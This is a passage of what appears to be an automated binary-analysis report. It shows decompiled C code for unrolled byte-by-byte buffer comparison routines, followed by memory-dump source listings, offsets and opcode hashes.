                                        				void* _t299;
                                        				void* _t301;
                                        				void* _t303;
                                        				void* _t305;
                                        				void* _t307;
                                        				void* _t309;
                                        				void* _t311;
                                        				void* _t313;
                                        				void* _t315;
                                        				void* _t317;
                                        				void* _t319;
                                        				void* _t321;
                                        				void* _t323;
                                        				void* _t325;
                                        				void* _t327;
                                        				void* _t329;
                                        				void* _t331;
                                        				void* _t333;
                                        				void* _t335;
                                        				void* _t336;
                                        
                                        				_t336 = __esi;
                                        				_t294 = __edx;
                                        				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                                        					_t246 = 0;
                                        					L14:
                                        					if(_t246 != 0) {
                                        						goto L1;
                                        					}
                                        					_t198 =  *(_t336 - 0x1b);
                                        					if(_t198 ==  *(_t294 - 0x1b)) {
                                        						_t246 = 0;
                                        						L25:
                                        						if(_t246 != 0) {
                                        							goto L1;
                                        						}
                                        						_t199 =  *(_t336 - 0x17);
                                        						if(_t199 ==  *(_t294 - 0x17)) {
                                        							_t246 = 0;
                                        							L36:
                                        							if(_t246 != 0) {
                                        								goto L1;
                                        							}
                                        							_t200 =  *(_t336 - 0x13);
                                        							if(_t200 ==  *(_t294 - 0x13)) {
                                        								_t246 = 0;
                                        								L47:
                                        								if(_t246 != 0) {
                                        									goto L1;
                                        								}
                                        								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                                        									_t246 = 0;
                                        									L58:
                                        									if(_t246 != 0) {
                                        										goto L1;
                                        									}
                                        									_t202 =  *(_t336 - 0xb);
                                        									if(_t202 ==  *(_t294 - 0xb)) {
                                        										_t246 = 0;
                                        										L69:
                                        										if(_t246 != 0) {
                                        											goto L1;
                                        										}
                                        										_t203 =  *(_t336 - 7);
                                        										if(_t203 ==  *(_t294 - 7)) {
                                        											_t246 = 0;
                                        											L80:
                                        											if(_t246 != 0) {
                                        												goto L1;
                                        											}
                                        											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
                                        											if(_t297 == 0) {
                                        												L83:
                                        												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                                        												if(_t299 == 0) {
                                        													L3:
                                        													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                                        													if(_t246 != 0) {
                                        														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        													}
                                        													goto L1;
                                        												}
                                        												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                                        												if(_t246 != 0) {
                                        													goto L1;
                                        												} else {
                                        													goto L3;
                                        												}
                                        											}
                                        											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                                        											if(_t246 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L83;
                                        										}
                                        										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                                        										if(_t301 == 0) {
                                        											L73:
                                        											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                                        											if(_t303 == 0) {
                                        												L75:
                                        												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                                        												if(_t305 == 0) {
                                        													L77:
                                        													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                                        													if(_t246 != 0) {
                                        														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        													}
                                        													goto L80;
                                        												}
                                        												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                                        												if(_t246 != 0) {
                                        													goto L1;
                                        												}
                                        												goto L77;
                                        											}
                                        											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                                        											if(_t246 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L75;
                                        										}
                                        										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                                        										if(_t246 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L73;
                                        									}
                                        									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                                        									if(_t307 == 0) {
                                        										L62:
                                        										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                                        										if(_t309 == 0) {
                                        											L64:
                                        											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                                        											if(_t311 == 0) {
                                        												L66:
                                        												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                                        												if(_t246 != 0) {
                                        													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        												}
                                        												goto L69;
                                        											}
                                        											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                                        											if(_t246 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L66;
                                        										}
                                        										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                                        										if(_t246 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L64;
                                        									}
                                        									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                                        									if(_t246 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L62;
                                        								}
                                        								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                                        								if(_t313 == 0) {
                                        									L51:
                                        									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                                        									if(_t315 == 0) {
                                        										L53:
                                        										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                                        										if(_t317 == 0) {
                                        											L55:
                                        											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                                        											if(_t246 != 0) {
                                        												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        											}
                                        											goto L58;
                                        										}
                                        										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                                        										if(_t246 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L55;
                                        									}
                                        									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                                        									if(_t246 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L53;
                                        								}
                                        								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                                        								if(_t246 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L51;
                                        							}
                                        							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                                        							if(_t319 == 0) {
                                        								L40:
                                        								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                                        								if(_t321 == 0) {
                                        									L42:
                                        									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                                        									if(_t323 == 0) {
                                        										L44:
                                        										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                                        										if(_t246 != 0) {
                                        											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        										}
                                        										goto L47;
                                        									}
                                        									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                                        									if(_t246 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L44;
                                        								}
                                        								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                                        								if(_t246 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L42;
                                        							}
                                        							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                                        							if(_t246 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L40;
                                        						}
                                        						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                                        						if(_t325 == 0) {
                                        							L29:
                                        							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                                        							if(_t327 == 0) {
                                        								L31:
                                        								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                                        								if(_t329 == 0) {
                                        									L33:
                                        									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                                        									if(_t246 != 0) {
                                        										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        									}
                                        									goto L36;
                                        								}
                                        								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                                        								if(_t246 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L33;
                                        							}
                                        							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                                        							if(_t246 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L31;
                                        						}
                                        						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                                        						if(_t246 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L29;
                                        					}
                                        					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                                        					if(_t331 == 0) {
                                        						L18:
                                        						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                                        						if(_t333 == 0) {
                                        							L20:
                                        							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                                        							if(_t335 == 0) {
                                        								L22:
                                        								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                                        								if(_t246 != 0) {
                                        									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L25;
                                        							}
                                        							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                                        							if(_t246 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L22;
                                        						}
                                        						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                                        						if(_t246 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L20;
                                        					}
                                        					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                                        					if(_t246 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L18;
                                        				} else {
                                        					__edi =  *(__esi - 0x1f) & 0x000000ff;
                                        					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                                        					if(__edi == 0) {
                                        						L7:
                                        						__edi =  *(__esi - 0x1e) & 0x000000ff;
                                        						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                        						if(__edi == 0) {
                                        							L9:
                                        							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                        							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                        							if(__edi == 0) {
                                        								L11:
                                        								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                                        								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                        								if(__ecx != 0) {
                                        									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L14;
                                        							}
                                        							0 = 0 | __edi > 0x00000000;
                                        							__ecx = (__edi > 0) * 2 != 1;
                                        							if((__edi > 0) * 2 != 1) {
                                        								goto L1;
                                        							}
                                        							goto L11;
                                        						}
                                        						0 = 0 | __edi > 0x00000000;
                                        						__ecx = (__edi > 0) * 2 != 1;
                                        						if((__edi > 0) * 2 != 1) {
                                        							goto L1;
                                        						}
                                        						goto L9;
                                        					}
                                        					0 = 0 | __edi > 0x00000000;
                                        					__ecx = (__edi > 0) * 2 != 1;
                                        					if((__edi > 0) * 2 != 1) {
                                        						goto L1;
                                        					}
                                        					goto L7;
                                        				}
                                        				L1:
                                        				_t197 = _t246;
                                        				return _t197;
                                        			}
                                        0x0009beaa
                                        0x0009beac
                                        0x0009bec4
                                        0x0009becc
                                        0x0009bece
                                        0x0009bee6
                                        0x0009beee
                                        0x0009bef0
                                        0x0009bf08
                                        0x0009bf10
                                        0x0009bf12
                                        0x0009bf1b
                                        0x0009bf1b
                                        0x00000000
                                        0x0009bf12
                                        0x0009bef9
                                        0x0009bf02
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0009bf02
                                        0x0009bed7
                                        0x0009bee0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0009bee0
                                        0x0009beb5
                                        0x0009bebe
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0009bebe
                                        0x0009be13
                                        0x0009be15
                                        0x0009be2d
                                        0x0009be35
                                        0x0009be37
                                        0x0009be4f
                                        0x0009be57
                                        0x0009be59
                                        0x0009be71
                                        0x0009be79
                                        0x0009be7b
                                        0x0009be84
                                        0x0009be84
                                        0x00000000
                                        0x0009be7b
                                        0x0009be62
                                        0x0009be6b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0009be6b
                                        0x0009be40
                                        0x0009be49
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0009be49
                                        0x0009be1e
                                        0x0009be27
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0009bd74
                                        0x0009bd78
                                        0x0009bd7c
                                        0x0009bd7e
                                        0x0009bd96
                                        0x0009bd96
                                        0x0009bd9e
                                        0x0009bda0
                                        0x0009bdb8
                                        0x0009bdb8
                                        0x0009bdc0
                                        0x0009bdc2
                                        0x0009bdda
                                        0x0009bdda
                                        0x0009bde2
                                        0x0009bde4
                                        0x0009bded
                                        0x0009bded
                                        0x00000000
                                        0x0009bde4
                                        0x0009bdc8
                                        0x0009bdcb
                                        0x0009bdd4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0009bdd4
                                        0x0009bda6
                                        0x0009bda9
                                        0x0009bdb2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0009bdb2
                                        0x0009bd84
                                        0x0009bd87
                                        0x0009bd90
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0009bd90
                                        0x0009b4f6
                                        0x0009b4f6
                                        0x0009c2e7

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction ID: 27ee25c210343531e16a815e9bd70ca42a23e857cc1c890be36188dc53843a8f
                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction Fuzzy Hash: B3C141322091934ADFAD463E967443FBAE15B927B131A076DD8B2CF1D6FF208524F620
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0009B4FE(void* __edx, void* __esi) {
                                        				signed int _t184;
                                        				signed char _t185;
                                        				signed char _t186;
                                        				signed char _t187;
                                        				signed char _t188;
                                        				signed char _t190;
                                        				signed int _t231;
                                        				void* _t275;
                                        				void* _t278;
                                        				void* _t280;
                                        				void* _t282;
                                        				void* _t284;
                                        				void* _t286;
                                        				void* _t288;
                                        				void* _t290;
                                        				void* _t292;
                                        				void* _t294;
                                        				void* _t296;
                                        				void* _t298;
                                        				void* _t300;
                                        				void* _t302;
                                        				void* _t304;
                                        				void* _t306;
                                        				void* _t308;
                                        				void* _t310;
                                        				void* _t312;
                                        				void* _t313;
                                        
                                        				_t313 = __esi;
                                        				_t275 = __edx;
                                        				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
                                        					_t231 = 0;
                                        					L11:
                                        					if(_t231 != 0) {
                                        						goto L1;
                                        					}
                                        					_t185 =  *(_t313 - 0x19);
                                        					if(_t185 ==  *(_t275 - 0x19)) {
                                        						_t231 = 0;
                                        						L22:
                                        						if(_t231 != 0) {
                                        							goto L1;
                                        						}
                                        						_t186 =  *(_t313 - 0x15);
                                        						if(_t186 ==  *(_t275 - 0x15)) {
                                        							_t231 = 0;
                                        							L33:
                                        							if(_t231 != 0) {
                                        								goto L1;
                                        							}
                                        							_t187 =  *(_t313 - 0x11);
                                        							if(_t187 ==  *(_t275 - 0x11)) {
                                        								_t231 = 0;
                                        								L44:
                                        								if(_t231 != 0) {
                                        									goto L1;
                                        								}
                                        								_t188 =  *(_t313 - 0xd);
                                        								if(_t188 ==  *(_t275 - 0xd)) {
                                        									_t231 = 0;
                                        									L55:
                                        									if(_t231 != 0) {
                                        										goto L1;
                                        									}
                                        									if( *(_t313 - 9) ==  *(_t275 - 9)) {
                                        										_t231 = 0;
                                        										L66:
                                        										if(_t231 != 0) {
                                        											goto L1;
                                        										}
                                        										_t190 =  *(_t313 - 5);
                                        										if(_t190 ==  *(_t275 - 5)) {
                                        											_t231 = 0;
                                        											L77:
                                        											if(_t231 == 0) {
                                        												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
                                        												if(_t231 != 0) {
                                        													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        												}
                                        											}
                                        											goto L1;
                                        										}
                                        										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
                                        										if(_t278 == 0) {
                                        											L70:
                                        											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
                                        											if(_t280 == 0) {
                                        												L72:
                                        												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
                                        												if(_t282 == 0) {
                                        													L74:
                                        													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
                                        													if(_t231 != 0) {
                                        														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        													}
                                        													goto L77;
                                        												}
                                        												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
                                        												if(_t231 != 0) {
                                        													goto L1;
                                        												}
                                        												goto L74;
                                        											}
                                        											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
                                        											if(_t231 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L72;
                                        										}
                                        										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
                                        										if(_t231 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L70;
                                        									}
                                        									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
                                        									if(_t284 == 0) {
                                        										L59:
                                        										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
                                        										if(_t286 == 0) {
                                        											L61:
                                        											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
                                        											if(_t288 == 0) {
                                        												L63:
                                        												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
                                        												if(_t231 != 0) {
                                        													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        												}
                                        												goto L66;
                                        											}
                                        											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
                                        											if(_t231 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L63;
                                        										}
                                        										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
                                        										if(_t231 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L61;
                                        									}
                                        									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
                                        									if(_t231 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L59;
                                        								}
                                        								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
                                        								if(_t290 == 0) {
                                        									L48:
                                        									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
                                        									if(_t292 == 0) {
                                        										L50:
                                        										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
                                        										if(_t294 == 0) {
                                        											L52:
                                        											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
                                        											if(_t231 != 0) {
                                        												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        											}
                                        											goto L55;
                                        										}
                                        										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
                                        										if(_t231 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L52;
                                        									}
                                        									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
                                        									if(_t231 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L50;
                                        								}
                                        								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
                                        								if(_t231 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L48;
                                        							}
                                        							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
                                        							if(_t296 == 0) {
                                        								L37:
                                        								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
                                        								if(_t298 == 0) {
                                        									L39:
                                        									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
                                        									if(_t300 == 0) {
                                        										L41:
                                        										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
                                        										if(_t231 != 0) {
                                        											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        										}
                                        										goto L44;
                                        									}
                                        									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
                                        									if(_t231 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L41;
                                        								}
                                        								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
                                        								if(_t231 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L39;
                                        							}
                                        							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
                                        							if(_t231 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L37;
                                        						}
                                        						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
                                        						if(_t302 == 0) {
                                        							L26:
                                        							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
                                        							if(_t304 == 0) {
                                        								L28:
                                        								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
                                        								if(_t306 == 0) {
                                        									L30:
                                        									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
                                        									if(_t231 != 0) {
                                        										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        									}
                                        									goto L33;
                                        								}
                                        								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
                                        								if(_t231 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L30;
                                        							}
                                        							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
                                        							if(_t231 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L28;
                                        						}
                                        						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
                                        						if(_t231 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L26;
                                        					}
                                        					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
                                        					if(_t308 == 0) {
                                        						L15:
                                        						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
                                        						if(_t310 == 0) {
                                        							L17:
                                        							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
                                        							if(_t312 == 0) {
                                        								L19:
                                        								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
                                        								if(_t231 != 0) {
                                        									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L22;
                                        							}
                                        							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
                                        							if(_t231 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L19;
                                        						}
                                        						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
                                        						if(_t231 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L17;
                                        					}
                                        					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
                                        					if(_t231 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L15;
                                        				} else {
                                        					__edi = __al & 0x000000ff;
                                        					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                        					if(__edi == 0) {
                                        						L4:
                                        						__edi =  *(__esi - 0x1c) & 0x000000ff;
                                        						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                        						if(__edi == 0) {
                                        							L6:
                                        							__edi =  *(__esi - 0x1b) & 0x000000ff;
                                        							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                        							if(__edi == 0) {
                                        								L8:
                                        								__ecx =  *(__esi - 0x1a) & 0x000000ff;
                                        								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                        								if(__ecx != 0) {
                                        									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L11;
                                        							}
                                        							0 = 0 | __edi > 0x00000000;
                                        							__ecx = (__edi > 0) * 2 != 1;
                                        							if((__edi > 0) * 2 != 1) {
                                        								goto L1;
                                        							}
                                        							goto L8;
                                        						}
                                        						0 = 0 | __edi > 0x00000000;
                                        						__ecx = (__edi > 0) * 2 != 1;
                                        						if((__edi > 0) * 2 != 1) {
                                        							goto L1;
                                        						}
                                        						goto L6;
                                        					}
                                        					0 = 0 | __edi > 0x00000000;
                                        					__ecx = (__edi > 0) * 2 != 1;
                                        					if((__edi > 0) * 2 != 1) {
                                        						goto L1;
                                        					}
                                        					goto L4;
                                        				}
                                        				L1:
                                        				_t184 = _t231;
                                        				return _t184;
                                        			}































                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction ID: 1229143badd53c9785a837a53ce9a02b699a3f6f0f927c5df3e40b54c50f337c
                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction Fuzzy Hash: 9EC140322091930ADFAD463EA67453FBAE15B917B131A075DD8B2CB1D6FF20D524F620
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0009B0E6(void* __edx, void* __esi) {
                                        				signed char _t177;
                                        				void* _t178;
                                        				signed char _t179;
                                        				signed char _t180;
                                        				signed char _t181;
                                        				signed char _t183;
                                        				signed char _t184;
                                        				void* _t228;
                                        				void* _t278;
                                        				void* _t281;
                                        				void* _t283;
                                        				void* _t285;
                                        				void* _t287;
                                        				void* _t289;
                                        				void* _t291;
                                        				void* _t293;
                                        				void* _t295;
                                        				void* _t297;
                                        				void* _t299;
                                        				void* _t301;
                                        				void* _t303;
                                        				void* _t305;
                                        				void* _t307;
                                        				void* _t309;
                                        				void* _t311;
                                        				void* _t313;
                                        				void* _t315;
                                        				void* _t317;
                                        				void* _t319;
                                        				void* _t321;
                                        				void* _t322;
                                        
                                        				_t322 = __esi;
                                        				_t278 = __edx;
                                        				_t177 =  *(__esi - 0x1c);
                                        				if(_t177 ==  *(__edx - 0x1c)) {
                                        					_t228 = 0;
                                        					L10:
                                        					if(_t228 != 0) {
                                        						L78:
                                        						_t178 = _t228;
                                        						return _t178;
                                        					}
                                        					_t179 =  *(_t322 - 0x18);
                                        					if(_t179 ==  *(_t278 - 0x18)) {
                                        						_t228 = 0;
                                        						L21:
                                        						if(_t228 != 0) {
                                        							goto L78;
                                        						}
                                        						_t180 =  *(_t322 - 0x14);
                                        						if(_t180 ==  *(_t278 - 0x14)) {
                                        							_t228 = 0;
                                        							L32:
                                        							if(_t228 != 0) {
                                        								goto L78;
                                        							}
                                        							_t181 =  *(_t322 - 0x10);
                                        							if(_t181 ==  *(_t278 - 0x10)) {
                                        								_t228 = 0;
                                        								L43:
                                        								if(_t228 != 0) {
                                        									goto L78;
                                        								}
                                        								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
                                        									_t228 = 0;
                                        									L54:
                                        									if(_t228 != 0) {
                                        										goto L78;
                                        									}
                                        									_t183 =  *(_t322 - 8);
                                        									if(_t183 ==  *(_t278 - 8)) {
                                        										_t228 = 0;
                                        										L65:
                                        										if(_t228 != 0) {
                                        											goto L78;
